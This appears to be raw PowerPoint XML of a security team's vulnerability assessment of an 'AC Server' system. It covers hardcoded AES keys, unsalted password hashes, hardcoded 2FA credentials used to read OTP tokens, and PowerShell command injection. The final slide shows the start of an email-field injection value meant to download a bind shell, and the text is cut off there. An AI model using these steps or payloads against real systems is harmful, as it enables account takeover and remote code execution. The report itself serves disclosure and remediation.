                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Integrity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337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V12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Hardcoded credentials for AC Server Admin Login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Penetration Testing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Reverse Engineering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Confidentiality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337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V13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Authentication weakness ( No 2FA for AC Server Admin Login )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Penetration Testing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Reverse Engineering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Confidentiality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337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V14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Hardcoded credentials for 2FA Server Login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Penetration Testing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Reverse Engineering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Confidentiality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  <a:tr h="337915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V15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just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Command Injection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Penetration Testing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Reverse Engineering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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>High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Integrity</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="900" kern="100">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr" latinLnBrk="1">
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" kern="100" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Availability</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" sz="900" kern="100"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  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="61000" marR="61000" marT="0" marB="0" anchor="ctr"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8745793" y="935084"/>
            <a:ext cx="3339034" cy="3293209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:pattFill prst="pct5">
            <a:fgClr>
              <a:schemeClr val="lt1"/>
            </a:fgClr>
            <a:bgClr>
              <a:schemeClr val="bg1"/>
            </a:bgClr>
          </a:pattFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/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Number of registered Vulnerability : 15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Count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per each testing category</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- Code review : 3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- Design review : 3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- Runtime Analysis : 6</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- Penetration test (incl. Reverse engineering) :  4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" fontAlgn="base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 fontAlgn="base"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rgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>V01, V02, V14, V15 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>will be presented in next slides </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4254827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Major vulnerability (V01, V02)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2281" y="2811537"/>
            <a:ext cx="8192405" cy="3370877"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="직사각형 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4042176" y="3512728"/>
            <a:ext cx="4838217" cy="17362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4042175" y="3837488"/>
            <a:ext cx="3744971" cy="18058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242628" y="959507"/>
            <a:ext cx="3074244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By code review, our team learned following information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AES256 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>encryption algorithm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>used, when reading and writing user information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>to DB file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There was hard coded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>initial vector (16 bytes) and key (32 bytes) values for AES256 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>encryption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Z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>ero </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>padding was used, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>is easy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>to deduce the padding value.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="직사각형 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4042174" y="4501696"/>
            <a:ext cx="7830275" cy="187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5" name="그림 14"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3802281" y="918461"/>
            <a:ext cx="4619577" cy="1655382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5295279" y="2271252"/>
            <a:ext cx="2742592" cy="1241476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/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5236286" y="2453472"/>
            <a:ext cx="1046527" cy="139225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5499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Major vulnerability (V01, V02)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06475" y="1106799"/>
            <a:ext cx="10361511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With this information, we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>could </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>decrypt the user information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1"/>
              <a:t>openssl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command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>in backend server</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="160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715" y="1679577"/>
            <a:ext cx="11675961" cy="49416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6967" y="2362463"/>
            <a:ext cx="6916993" cy="4287844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2" name="직선 화살표 연결선 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6384324" y="2100649"/>
            <a:ext cx="5049796" cy="757881"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="158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폭발 2 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="309715" y="3067106"/>
            <a:ext cx="5926979" cy="2388814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DB file is decrypted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28130709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Major vulnerability (V01, V02)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206476" y="3448799"/>
            <a:ext cx="377558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..</a:t>
            </a:r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6475" y="1114073"/>
            <a:ext cx="10361511" cy="47705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Also passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>are stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>after hashing using SHA256 without proper salt.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Thus an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>attacker can easily manipulate the password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>information by following procedure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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>     1. Decrypt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>DB using previous vulnerability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     2. Change and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>specific</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>user account</a:t>
            </a:r>
          </a:p>
          <a:p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    3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Overwrite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>the hash value </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>to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the DB file.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>    4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>. Encrypt the DB so that the information can be used by backend server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p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ko-KR" altLang="en-US" sz="16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206" y="2620758"/>
            <a:ext cx="11674878" cy="165608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/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="343206" y="3819641"/>
            <a:ext cx="11674878" cy="47194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폭발 2 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4470750" y="4764050"/>
            <a:ext cx="7547334" cy="2005997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Now, we can use the manipulated user information</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1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53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Major vulnerability (V01, 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V02)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05013" y="1046363"/>
            <a:ext cx="10987551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Impact</a:t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en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>an attacker gains </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>this information, this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>can lead to the exposure of sensitive user information, such as personal details, passwords, and financial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>information</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- Without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>using proper salt during password hashing, the confidentiality of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>the user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>passwords </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>can be easily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compromised</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty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Recommendation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- Store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>the encryption key and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>initial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>vector in a separate secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>storage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>instead of hardcoding them in the source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>code.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>salting by adding a unique salt value to the hash to ensure that different hashes are generated even for the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>passwords.</a:t>
            </a:r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9663" y="4007190"/>
            <a:ext cx="3748088" cy="17772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22539" y="4007191"/>
            <a:ext cx="4095751" cy="2203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3682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418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Roles &amp; Responsibility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16685" y="2147255"/>
            <a:ext cx="1627119" cy="206779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3298198" y="4879780"/>
            <a:ext cx="1609082" cy="100879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Runtime analysis</a:t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en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Opensource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> check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Minji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Tae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640530" y="4879780"/>
            <a:ext cx="1545675" cy="100879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Penetration test</a:t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en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code review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Youngjin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Kim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1667516" y="4879780"/>
            <a:ext cx="1584961" cy="100879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Static analysis</a:t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en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Opensource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> check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Chanhun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</a:rPr>
              <a:t>Seung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78502" y="4879780"/>
            <a:ext cx="1552178" cy="100879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Design review</a:t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en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Runtime analysis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Jongoh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Ha</a:t>
            </a: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304405" y="4917220"/>
            <a:ext cx="1766441" cy="97135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Reverse engineering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Penetration test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Truong </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Viet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58566" y="4917220"/>
            <a:ext cx="1824446" cy="97135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Our Captain</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mentor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cliff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4944117" y="4879780"/>
            <a:ext cx="1644336" cy="1008796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Design review</a:t>
            </a:r>
          </a:p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Static analysis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Hongjae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Lim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1" y="1000537"/>
            <a:ext cx="8138184" cy="3664923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0846" y="2315003"/>
            <a:ext cx="1857375" cy="18859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Major vulnerability (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V14)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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3655" y="1990325"/>
            <a:ext cx="10953750" cy="294322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50415" y="1007280"/>
            <a:ext cx="1126807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Our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>team learned hardcoded </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>admin’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>email account which is used for two factor authentication by conducting reverse engineering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043707" y="2466422"/>
            <a:ext cx="1336564" cy="26547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3043706" y="4300138"/>
            <a:ext cx="1469299" cy="275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956944" y="3803609"/>
            <a:ext cx="1469299" cy="27530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7627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Major vulnerability (V14)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0198" y="1297323"/>
            <a:ext cx="3802779" cy="546187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41425" y="1355355"/>
            <a:ext cx="5124753" cy="5168837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530733" y="827841"/>
            <a:ext cx="5533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Create a Python script to read the email via SMTP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889527" y="850667"/>
            <a:ext cx="574694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Run the script (Could read OTP token from sent mail box) box) </a:t>
            </a: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240770" y="3515036"/>
            <a:ext cx="1177669" cy="31954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6240770" y="6141804"/>
            <a:ext cx="1177669" cy="35072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42746" y="2236842"/>
            <a:ext cx="1851177" cy="34412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383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Major vulnerability (V14)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411340" y="1161970"/>
            <a:ext cx="104013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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Impact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smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>vulnerability allows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>attackers to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>steal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>OTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>token and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>can lead to unauthorized access.</a:t>
            </a:r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Recommendation</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- To prevent disclosure of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>sensitive information, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>admin’s account information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>should not be hardcoded.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>- Utilize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>secure storage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>and encryption </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>method to support secure data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/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797393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Major vulnerability (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V15)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"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  <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="그림 9"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="230423" y="927247"/>
            <a:ext cx="9187897" cy="1661560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="그림 11"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="230423" y="2710801"/>
            <a:ext cx="9335380" cy="3899278"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9570876" y="927247"/>
            <a:ext cx="224869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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We learned input validation check on email address was not strict in backend </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>server by code review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We learned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> command is used when sending OTP token via email </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pP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1064086" y="2844966"/>
            <a:ext cx="6811553" cy="50291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277446" y="1245591"/>
            <a:ext cx="7988474" cy="38508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971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Major vulnerability (V15)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24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388618" y="865941"/>
            <a:ext cx="10401302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New user account is registered to trigger downloading bind shell (malware)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 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
              <a:t>t@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>t.co</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" b="1" dirty="0"/>
              <a:t>' -F";</a:t>
            </a:r>
            <a:r>
